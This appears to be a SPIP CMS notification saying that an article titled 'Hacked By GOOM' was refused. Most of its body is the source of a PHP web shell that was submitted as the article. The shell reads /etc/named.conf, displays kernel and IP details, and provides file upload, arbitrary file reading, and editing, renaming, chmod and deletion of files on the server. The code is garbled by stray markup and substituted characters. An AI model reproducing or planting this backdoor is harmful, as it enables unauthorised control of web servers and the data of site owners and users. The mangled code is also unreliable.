**SPIP**
# Article refusé
L’article "**Hacked By GOOM** (https://www.spip.net/fr_article6502.html)"
vient d’être refusé par touti.
* * *
Hacked By GOOM
## Hacked By GOOM
Hacked By GOOM
dimanche 24 mars 2019
Hacked By GOOM
`
<?php
<br />error_reporting
(
0
);
<br />@
set_time_limit
(
0
);
<br />@
session_start
();
$server_ip
=
$_SERVER
[
'SERVER_ADDR'
];
$pageURL
=
'http://'
.
$_SERVER
[
"SERVER_NAME"
].
$_SERVER
[
"REQUEST_URI"
];
$u
=
explode
(
"/"
,
$pageURL
);
$pageURL
=
str_replace
(
$u
[
count
(
$u
)-
1
],
""
,
$pageURL
);
$site_url
=
$_SERVER
[
'SERVER_URl'
];
$domain_url
=
$_SERVER
[
'DOMAIN_URl'
];
<br />if(
strtolower
(
substr
(
PHP_OS
,
0
,
3
)) ==
"win"
)
<br />
$os
=
'win'
;
<br />else
<br />
$os
=
'nix'
;
<br />if(
$GLOBALS
[
'os'
] ==
'nix'
) {
<br />
$dominios
= @
file_get_contents
(
"/etc/named.conf"
);
<br /> if(!
$dominios
) {
<br />
$d0c
=
"CANT READ named.conf"
;
<br /> } else {
<br /> @
preg_match_all
(
'/.*?zone "(.*?)" {/'
,
$dominios
,
$out
);
<br />
$out
=
sizeof
(
array_unique
(
$out
[
1
]));
<br />
$d0c
=
$out
.
" Domains"
;
<br /> }
<br /> } else {
<br />
$d0c
=
" --- "
;
<br /> }
?>
`
goom le bg
Kernel Version: <?php echo php_uname(); ?>
Domains: <?php echo $d0c;?>Sites Server IP: <?php echo "$server_ip"; echo"
[[Bing
Search](http://bing.com/search?q=ip:".$server_ip."&go=&form=QBLH&filt=all)]
[[Zone-H](http://zone-h.com/archive/ip=".$server_ip.")]";?><?php echo '
* Anon Shell ()
* Adminer ()'; ?> <?php error\_reporting(0); set\_time\_limit(0);
if(get\_magic\_quotes\_gpc()){ foreach($\_POST as $key=>$value){
$\_POST[$key] = stripslashes($value); } } echo '
Path : ‹ ; if(isset($\_GET[‹ path ›])){ $path = $\_GET[‹ path ›]; }else{ $path =
getcwd(); } $path = str_replace( ›\\’,’/’,$path); $paths =
explode(’/’,$path); foreach($paths as $id=>$pat){ if($pat == ‹ › && $id ==
0){ $a = true; echo ‹ / (https://www.spip.net/?path=/) ›; continue; } if($pat
== ‹ ›) continue; echo ‹ ›.$pat.’ (https://www.spip.net/?path=)/’; } echo ’
'; if(isset($\_FILES\['file'])){
if(copy($\_FILES['file'\]\['tmp\_name'\],$path.'/'.$\_FILES\['file'\]\['name'\])){
echo 'Upload Success
'; }else{ echo 'Upload Failed
'; } } echo ' '; if(isset($_GET['filesrc'])){ echo "
Current File : "; echo $_GET['filesrc']; echo '
---------------------------------------------------------------------------
'; echo('
'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'');
}elseif(isset($\_GET['option']) && $\_POST['opt'] != 'delete'){ echo '
---------------------------------------------------------------------------
'.$_POST['path'].'
'; if($\_POST['opt'] == 'chmod'){ if(isset($\_POST['perm'])){
if(chmod($\_POST['path'],$\_POST['perm'])){ echo 'Change Permission Success
'; }else{ echo 'Change Permission Failed
'; } } echo ''; }elseif($\_POST['opt'] == 'rename'){
if(isset($\_POST['newname'])){
if(rename($\_POST['path'],$path.'/'.$\_POST['newname'])){ echo 'Name Change
Success
'; }else{ echo 'Name Change Failed
'; } $\_POST['name'] = $\_POST['newname']; } echo '';
}elseif($\_POST['opt'] == 'edit'){ if(isset($\_POST['src'])){ $fp =
fopen($\_POST['path'],'w'); if(fwrite($fp,$\_POST['src'])){ echo 'Edit File
Success
'; }else{ echo 'Edit File Failed
'; } fclose($fp); } echo ''; } echo ' '; }else{ echo '
---------------------------------------------------------------------------
'; if(isset($\_GET['option']) && $\_POST['opt'] == 'delete'){
if($\_POST['type'] == 'dir'){ if(rmdir($\_POST['path'])){ echo 'Directory
Deleted
'; }else{ echo 'Directory Delete Failed
'; } }elseif($\_POST['type'] == 'file'){ if(unlink($\_POST['path'])){ echo
'File Deleted
'; }else{ echo 'File Delete Failed
'; } } } echo ' '; if(function_exists('opendir')) { if($opendir =
opendir($path)) { while(($readdir = readdir($opendir)) !== false) {
$scandir[] = $readdir; } closedir($opendir); } sort($scandir); } else {
$scandir = scandir($path); } echo '
Name</peller>
Size</peller>
Permission</peller>
Modify</peller> '; foreach($scandir as $dir){ if(!is_dir($path.'/'.$dir) ||
$dir == '.' || $dir == '..') continue; echo '
'.$dir.' (https://www.spip.net/?path=)
--
'; if(is_writable($path.'/'.$dir)) echo '';
elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir);
if(is\_writable($path.'/'.$dir) || !is\_readable($path.'/'.$dir)) echo '';
echo '
'; } echo '
'; foreach($scandir as $file){ if(!is_file($path.'/'.$file)) continue;
$size = filesize($path.'/'.$file)/1024; $size = round($size,3); if($size >=
1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; }
echo '
'.$file.' (https://www.spip.net/?filesrc=)
'.$size.'
'; if(is_writable($path.'/'.$file)) echo '';
elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file);
if(is\_writable($path.'/'.$file) || !is\_readable($path.'/'.$file)) echo
''; echo '
'; } echo '@@@hr@@@ '; } echo '
U7TiM4T3_H4x0R Plugin 2018
’ ;
function perms($file)*
$perms = fileperms($file) ;
if (($perms & 0xC000) == 0xC000) *
// Socket
$info = ’s’ ;
* elseif (($perms & 0xA000) == 0xA000) *
// Symbolic Link
$info = ’l’ ;
* elseif (($perms & 0x8000) == 0x8000) *
// Regular
$info = ’-’ ;
* elseif (($perms & 0x6000) == 0x6000) *
// Block special
$info = ’b’ ;
* elseif (($perms & 0x4000) == 0x4000) *
// Directory
$info = ’d’ ;
* elseif (($perms & 0x2000) == 0x2000) *
// Character special
$info = ’c’ ;
* elseif (($perms & 0x1000) == 0x1000) *
// FIFO pipe
$info = ’p’ ;
* else *
// Unknown
$info = ’u’ ;
*
// Owner
$info .= (($perms & 0x0100) ? ’r’ : ’-’) ;
$info .= (($perms & 0x0080) ? ’w’ : ’-’) ;
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? ’s’ : ’x’ ) :
(($perms & 0x0800) ? ’S’ : ’-’)) ;
// Group
$info .= (($perms & 0x0020) ? ’r’ : ’-’) ;
$info .= (($perms & 0x0010) ? ’w’ : ’-’) ;
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? ’s’ : ’x’ ) :
(($perms & 0x0400) ? ’S’ : ’-’)) ;
// World
$info .= (($perms & 0x0004) ? ’r’ : ’-’) ;
$info .= (($perms & 0x0002) ? ’w’ : ’-’) ;
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? ’t’ : ’x’ ) :
(($perms & 0x0200) ? ’T’ : ’-’)) ;
return $info ;
</i>
?>
`
<?php
<br />?>
`
**P.-S.**
ccdcd
— Envoyé par SPIP (https://www.spip.net/)
